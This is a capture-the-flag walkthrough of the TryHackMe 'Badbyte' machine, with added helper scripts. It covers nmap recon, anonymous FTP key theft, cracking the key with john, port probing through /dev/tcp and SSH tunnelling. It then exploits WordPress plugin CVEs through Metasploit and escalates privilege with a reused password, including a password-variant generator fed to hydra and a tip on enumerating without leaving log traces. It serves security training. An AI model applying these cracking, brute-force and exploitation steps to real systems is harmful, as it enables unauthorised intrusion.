[THM] : Badbyte Walkthrough

Suvam Adhikari
4 min read · Feb 5, 2023

Initial Recon

# Nmap 7.92 scan initiated Sun Feb  5 16:52:37 2023 as: nmap -sV -sC -p - -v -T4 -Pn -oN nmap.txt 10.10.141.79
Warning: 10.10.141.79 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.141.79
Host is up (0.22s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
| 256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_ 256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
10758/tcp filtered unknown
18237/tcp filtered unknown
30024/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.6.57
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 1743 Mar 23 2021 id_rsa
|_-rw-r--r-- 1 ftp ftp 78 Mar 23 2021 note.txt
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 5 17:05:05 2023 -- 1 IP address (1 host up) scanned in 747.64 seconds

I logged in to the FTP service anonymously and found two files, id_rsa and note.txt. note.txt contained the username for the SSH service, but the key was passphrase-protected, so ssh still prompted for a password. I converted id_rsa into a hash with ssh2john, cracked the passphrase with john and logged in.

python2 /usr/share/john/ssh2john.py id_rsa  > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

I then tried to check which ports were listening on localhost, but neither netstat nor ss was installed. The machine was empty XD.

I tried uploading a static binary from my machine over ftp and scp, but both failed. So I used the following bash loop, which relies on bash's built-in /dev/tcp pseudo-device, to discover the ports open on localhost.

for i in {1..65535}; do (echo > /dev/tcp/127.0.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
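The one-liner above has two weaknesses: /dev/tcp has no connect timeout, so a firewalled port can stall the loop, and it probes all 65535 ports serially. When /proc is readable, the kernel's own socket table in /proc/net/tcp lists listening sockets directly (state 0A) and needs no tool at all. The script below is an added example, not code from the walkthrough: a probe with a hard timeout, a batched scan, and a parser for the /proc/net/tcp format. The SAMPLE_PROC_NET_TCP text is constructed to resemble the box (sshd on 22, the site on 127.0.0.1:80, a database on 3306, one established SSH session from the attacker) and is not real output from it.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Lists listening TCP
# sockets on a host without netstat/ss and probes ports with a timeout.
# Needs only a POSIX shell, coreutils timeout, and bash for /dev/tcp.

# Probe host $1 port $2 with a hard 1 s timeout so a filtered port cannot
# hang the loop. /dev/tcp is a bash feature, so the probe runs under bash
# even when this script is executed by sh. Exit status 0 means open.
port_open() {
    timeout 1 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Probe ports $2..$3 on host $1 in batches of 200 background jobs and
# print the open ones, one per line.
scan_range() {
    host=$1; p=$2; last=$3
    while [ "$p" -le "$last" ]; do
        ( port_open "$host" "$p" && echo "$p" ) &
        [ $((p % 200)) -eq 0 ] && wait
        p=$((p + 1))
    done
    wait
}

# Convert a /proc/net/tcp local_address field (little-endian hex IPv4
# followed by hex port, e.g. 0100007F:0050) to dotted-quad:port.
hex_addr_to_text() {
    n=$((0x${1%%:*}))       # 0100007F -> 16777343
    port=$((0x${1##*:}))    # 0050 -> 80
    printf '%d.%d.%d.%d:%d\n' \
        $((n & 255)) $(((n >> 8) & 255)) \
        $(((n >> 16) & 255)) $(((n >> 24) & 255)) "$port"
}

# Read /proc/net/tcp-formatted text on stdin and print every socket in
# state 0A (LISTEN). The fourth field is the state; the header row is
# skipped because its fourth field is the literal "st".
listening_from_proc() {
    while read -r sl laddr rem st rest; do
        [ "$st" = "0A" ] && hex_addr_to_text "$laddr"
    done
    return 0
}

# On the target:  listening_from_proc < /proc/net/tcp
# (/proc/net/tcp6 uses 32-hex-digit addresses; this parser only handles
# the IPv4 table.)

# Constructed sample, shaped like the box in the walkthrough: sshd on
# 0.0.0.0:22, the WordPress site on 127.0.0.1:80, a database on
# 127.0.0.1:3306, and one established SSH session from the attacker.
SAMPLE_PROC_NET_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18876 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21001 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   111        0 21245 1 0000000000000000 100 0 0 10 0
   3: 4F8D0A0A:0016 3906110A:C3A2 01 00000000:00000000 00:00000000 00000000     0        0 30112 1 0000000000000000 20 4 31 10 -1'

printf '%s\n' "$SAMPLE_PROC_NET_TCP" | listening_from_proc
```

Reading /proc/net/tcp is also quieter than a 65535-port connect loop: it creates no connections, so nothing shows up in the web server's or sshd's logs while you enumerate.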

Then I forwarded port 80 over SSH so I could reach it from my machine. The application was running the WordPress CMS.

ssh -i id_rsa -L 5656:127.0.0.1:80 errorcauser@10.10.141.79

Then I ran an nmap script scan through the tunnel and found two plugins. Googling the plugin versions showed them to be vulnerable to CVE-2020-11738 (Duplicator, unauthenticated file read) and CVE-2020-25213 (wp-file-manager, unauthenticated remote code execution).

nmap -A --script http-wordpress-enum --script-args search-limit=5000 -p 5656 127.0.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-05 18:53 +0545
Nmap scan report for view-localhost (127.0.0.1)
Host is up (0.00013s latency).

PORT STATE SERVICE VERSION
5656/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-wordpress-enum:
| Search limited to top 4778 themes/plugins
| plugins
| duplicator 1.3.26
|_ wp-file-manager 6.0
|_http-server-header: Apache/2.4.29 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.61 seconds
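A quick check on the enumeration above, added here as an example rather than taken from the walkthrough: parse the http-wordpress-enum lines and flag any plugin whose version is below the release that fixed the CVE. The fixed versions (Duplicator 1.3.28 for CVE-2020-11738, wp-file-manager 6.9 for CVE-2020-25213) are taken from the public advisories for those CVEs; the NMAP_OUTPUT sample is copied from the scan above. Version components are compared numerically, because a plain string sort would rank 6.10 below 6.9 and miss or mis-flag plugins.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: flag WordPress plugin
# versions in nmap http-wordpress-enum output that predate the fix for a
# known CVE. Fixed versions below are taken from the public advisories
# for the two CVEs named in the text.

# Sample copied from the nmap output in the walkthrough.
NMAP_OUTPUT='| http-wordpress-enum:
| Search limited to top 4778 themes/plugins
| plugins
| duplicator 1.3.26
|_ wp-file-manager 6.0
|_http-server-header: Apache/2.4.29 (Ubuntu)'

# slug, first fixed version, CVE
FIXED_VERSIONS='duplicator 1.3.28 CVE-2020-11738
wp-file-manager 6.9 CVE-2020-25213'

# Exit 0 when dotted version $1 is strictly lower than $2. Components are
# compared as integers, so 6.10 is correctly newer than 6.9; missing
# trailing components count as 0 (1.3 equals 1.3.0).
version_lt() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        x=${x:-0}; y=${y:-0}
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
    done
    return 1
}

# Read http-wordpress-enum output on stdin; print "slug version < fixed (CVE)"
# for each plugin in FIXED_VERSIONS whose reported version predates the fix.
# The sed pattern keeps only "| slug version" lines (with or without the
# "|_" closing marker) and drops headers and the http-server-header line.
flag_vulnerable_plugins() {
    sed -n 's/^|_\{0,1\} *\([a-z0-9-]*\) \([0-9][0-9.]*\)$/\1 \2/p' |
    while read -r slug ver; do
        printf '%s\n' "$FIXED_VERSIONS" | while read -r fslug fver cve; do
            [ "$slug" = "$fslug" ] && version_lt "$ver" "$fver" &&
                echo "$slug $ver < $fver ($cve)"
        done
    done
    return 0
}

printf '%s\n' "$NMAP_OUTPUT" | flag_vulnerable_plugins
```

In practice you would pipe the live scan in (`nmap ... | flag_vulnerable_plugins`) and keep FIXED_VERSIONS as a file you maintain; the version string nmap reports comes from the plugin's readme.txt, so a site that has removed readme files will show no version and needs a manual check.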

The wp-file-manager RCE has a Metasploit module, and I used it to obtain a shell as user cth.

After enumerating the machine I found, via a .viminfo file owned by cth, a bash.log file in /var/log that contained cth's old password. Incrementing one digit of the old password gave the current one, and I logged in as cth with it. cth's sudo rights on badbyte allow running any command as any user on any host, so sudo gives root.
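The reuse pattern above (old password plus one incremented digit) is common enough to script instead of guessing by hand. As an added example, not from the walkthrough, the function below builds every single-digit-increment variant of a leaked old password so the list can be tried against SSH with a tool such as hydra. The old password used in the demonstration is constructed, not the one from the box.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: candidate passwords
# derived from a leaked old one by incrementing a single digit (9 wraps
# to 0), one candidate per digit position.

increment_digit_candidates() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= length($0); i++) {
            c = substr($0, i, 1)
            if (c ~ /^[0-9]$/)
                print substr($0, 1, i - 1) ((c + 1) % 10) substr($0, i + 1)
        }
    }'
}

# Constructed old password for the demonstration (not the real one).
OLD_PASSWORD='Summer2019!'
increment_digit_candidates "$OLD_PASSWORD"

# Save the list and feed it to a brute-forcer, e.g.:
#   increment_digit_candidates "$OLD_PASSWORD" > candidates.txt
#   hydra -l cth -P candidates.txt ssh://10.10.141.79
```

Four candidates for a password with four digits is small enough that a handful of SSH attempts will not trip lockouts, which is exactly why this rotation habit is a weak one.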
